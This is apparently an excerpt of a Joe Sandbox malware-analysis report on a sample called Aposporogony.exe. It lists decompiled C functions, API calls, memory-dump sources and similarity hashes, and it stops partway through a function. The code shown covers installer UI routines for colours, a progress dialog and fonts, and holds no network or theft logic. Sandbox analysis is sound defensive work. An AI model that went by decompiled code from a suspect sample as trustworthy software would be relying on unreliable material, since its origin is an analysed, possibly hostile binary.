                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 589700163-1750128759
                                                                                                                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004043C6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                                      				struct tagLOGBRUSH _v16;
                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                      				void* _t44;
                                                                                                                                                                                      				signed char _t50;
                                                                                                                                                                                      				long* _t54;
                                                                                                                                                                                      
                                                                                                                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                                      					L18:
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                                                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                                                                      					goto L18;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t50 = _t54[5];
                                                                                                                                                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                                                                      						goto L18;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t39 =  *_t54;
                                                                                                                                                                                      					if((_t50 & 0x00000002) != 0) {
                                                                                                                                                                                      						_t39 = GetSysColor(_t39);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                                                                      						SetTextColor(_a8, _t39);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					SetBkMode(_a8, _t54[4]);
                                                                                                                                                                                      					_t41 = _t54[1];
                                                                                                                                                                                      					_v16.lbColor = _t41;
                                                                                                                                                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                                                                      						_t41 = GetSysColor(_t41);
                                                                                                                                                                                      						_v16.lbColor = _t41;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                                                                      						SetBkColor(_a8, _t41);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                                                                      						_v16.lbStyle = _t54[2];
                                                                                                                                                                                      						_t44 = _t54[3];
                                                                                                                                                                                      						if(_t44 != 0) {
                                                                                                                                                                                      							DeleteObject(_t44);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					return _t54[3];
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}









                                                                                                                                                                                      0x004043d8
                                                                                                                                                                                      0x0040448e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040448e
                                                                                                                                                                                      0x004043e9
                                                                                                                                                                                      0x004043ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404407
                                                                                                                                                                                      0x00404407
                                                                                                                                                                                      0x00404410
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404412
                                                                                                                                                                                      0x0040441e
                                                                                                                                                                                      0x00404421
                                                                                                                                                                                      0x00404421
                                                                                                                                                                                      0x00404427
                                                                                                                                                                                      0x0040442d
                                                                                                                                                                                      0x0040442d
                                                                                                                                                                                      0x00404439
                                                                                                                                                                                      0x0040443f
                                                                                                                                                                                      0x00404446
                                                                                                                                                                                      0x00404449
                                                                                                                                                                                      0x0040444c
                                                                                                                                                                                      0x0040444e
                                                                                                                                                                                      0x0040444e
                                                                                                                                                                                      0x00404456
                                                                                                                                                                                      0x0040445c
                                                                                                                                                                                      0x0040445c
                                                                                                                                                                                      0x00404466
                                                                                                                                                                                      0x0040446b
                                                                                                                                                                                      0x0040446e
                                                                                                                                                                                      0x00404473
                                                                                                                                                                                      0x00404476
                                                                                                                                                                                      0x00404476
                                                                                                                                                                                      0x00404486
                                                                                                                                                                                      0x00404486
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404489

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00402E8E(intOrPtr _a4) {
                                                                                                                                                                                      				short _v132;
                                                                                                                                                                                      				long _t6;
                                                                                                                                                                                      				struct HWND__* _t7;
                                                                                                                                                                                      				struct HWND__* _t15;
                                                                                                                                                                                      
                                                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                                                      					_t15 =  *0x418edc; // 0x0
                                                                                                                                                                                      					if(_t15 != 0) {
                                                                                                                                                                                      						_t15 = DestroyWindow(_t15);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x418edc = 0;
                                                                                                                                                                                      					return _t15;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				__eflags =  *0x418edc; // 0x0
                                                                                                                                                                                      				if(__eflags != 0) {
                                                                                                                                                                                      					return E004067FE(0);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t6 = GetTickCount();
                                                                                                                                                                                      				__eflags = _t6 -  *0x42a250;
                                                                                                                                                                                      				if(_t6 >  *0x42a250) {
                                                                                                                                                                                      					__eflags =  *0x42a248;
                                                                                                                                                                                      					if( *0x42a248 == 0) {
                                                                                                                                                                                      						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402DF3, 0);
                                                                                                                                                                                      						 *0x418edc = _t7;
                                                                                                                                                                                      						return ShowWindow(_t7, 5);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags =  *0x42a314 & 0x00000001;
                                                                                                                                                                                      					if(( *0x42a314 & 0x00000001) != 0) {
                                                                                                                                                                                      						wsprintfW( &_v132, L"... %d%%", E00402E72());
                                                                                                                                                                                      						return E00405450(0,  &_v132);
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t6;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x00402e9d
                                                                                                                                                                                      0x00402e9f
                                                                                                                                                                                      0x00402ea6
                                                                                                                                                                                      0x00402ea9
                                                                                                                                                                                      0x00402ea9
                                                                                                                                                                                      0x00402eaf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402eaf
                                                                                                                                                                                      0x00402eb7
                                                                                                                                                                                      0x00402ebd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402ec0
                                                                                                                                                                                      0x00402ec7
                                                                                                                                                                                      0x00402ecd
                                                                                                                                                                                      0x00402ed3
                                                                                                                                                                                      0x00402ed5
                                                                                                                                                                                      0x00402edb
                                                                                                                                                                                      0x00402f19
                                                                                                                                                                                      0x00402f22
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402f27
                                                                                                                                                                                      0x00402edd
                                                                                                                                                                                      0x00402ee4
                                                                                                                                                                                      0x00402ef5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402f03
                                                                                                                                                                                      0x00402ee4
                                                                                                                                                                                      0x00402f2f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00402F08), ref: 004054AB
                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 004054BD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00002505), ref: 00402E87
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                                                      • Opcode ID: 51439b2b95d5045c11db0bb73ceb5a5686aaca05f323755fc51522f93a634823
                                                                                                                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 51439b2b95d5045c11db0bb73ceb5a5686aaca05f323755fc51522f93a634823
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00404D1A(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                      				signed char _v12;
                                                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				long _v56;
                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                      				long _t15;
                                                                                                                                                                                      				unsigned int _t19;
                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                      				struct HWND__* _t28;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t28 = _a4;
                                                                                                                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					_v56 = _t15;
                                                                                                                                                                                      					_v60 = 4;
                                                                                                                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                                                                                                      					return _v24;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t19 = GetMessagePos();
                                                                                                                                                                                      				_v16 = _t19 >> 0x10;
                                                                                                                                                                                      				_v20 = _t19;
                                                                                                                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                                      					_t15 = _v8;
                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t25 | 0xffffffff;
                                                                                                                                                                                      			}














                                                                                                                                                                                      0x00404d28
                                                                                                                                                                                      0x00404d35
                                                                                                                                                                                      0x00404d3b
                                                                                                                                                                                      0x00404d79
                                                                                                                                                                                      0x00404d79
                                                                                                                                                                                      0x00404d88
                                                                                                                                                                                      0x00404d8f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404d91
                                                                                                                                                                                      0x00404d3d
                                                                                                                                                                                      0x00404d4c
                                                                                                                                                                                      0x00404d54
                                                                                                                                                                                      0x00404d57
                                                                                                                                                                                      0x00404d69
                                                                                                                                                                                      0x00404d6f
                                                                                                                                                                                      0x00404d76
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404d76
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                                                      			E00401DB9(intOrPtr __edx) {
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				int _t9;
                                                                                                                                                                                      				signed char _t15;
                                                                                                                                                                                      				struct HFONT__* _t18;
                                                                                                                                                                                      				intOrPtr _t30;
                                                                                                                                                                                      				struct HDC__* _t31;
                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t30 = __edx;
                                                                                                                                                                                      				_t31 = GetDC( *(_t35 - 8));
                                                                                                                                                                                      				_t9 = E00402C1F(2);
                                                                                                                                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                                                                                                      				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                                                                                      				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                                                                                      				 *0x40cde8 = E00402C1F(3);
                                                                                                                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                                                                                      				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                                                                                                      				 *0x40cdef = 1;
                                                                                                                                                                                      				 *0x40cdec = _t15 & 0x00000001;
                                                                                                                                                                                      				 *0x40cded = _t15 & 0x00000002;
                                                                                                                                                                                      				 *0x40cdee = _t15 & 0x00000004;
                                                                                                                                                                                      				E0040640A(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                                                                                      				_t18 = CreateFontIndirectW(0x40cdd8);
                                                                                                                                                                                      				_push(_t18);
                                                                                                                                                                                      				_push(_t33);
                                                                                                                                                                                      				E0040632F();
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x00401db9
                                                                                                                                                                                      0x00401dc4
                                                                                                                                                                                      0x00401dc6
                                                                                                                                                                                      0x00401dd3
                                                                                                                                                                                      0x00401dea
                                                                                                                                                                                      0x00401def
                                                                                                                                                                                      0x00401dfc
                                                                                                                                                                                      0x00401e01
                                                                                                                                                                                      0x00401e05
                                                                                                                                                                                      0x00401e10
                                                                                                                                                                                      0x00401e17
                                                                                                                                                                                      0x00401e29
                                                                                                                                                                                      0x00401e2f
                                                                                                                                                                                      0x00401e34
                                                                                                                                                                                      0x00401e3e
                                                                                                                                                                                      0x00402592
                                                                                                                                                                                      0x0040156d
                                                                                                                                                                                      0x00402a6b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                      • String ID: Calibri
                                                                                                                                                                                      • API String ID: 3808545654-1409258342
                                                                                                                                                                                      • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                                                                                      • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00402DF3(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                      				short _v132;
                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                      				WCHAR* _t19;
                                                                                                                                                                                      
                                                                                                                                                                                      				if(_a8 == 0x110) {
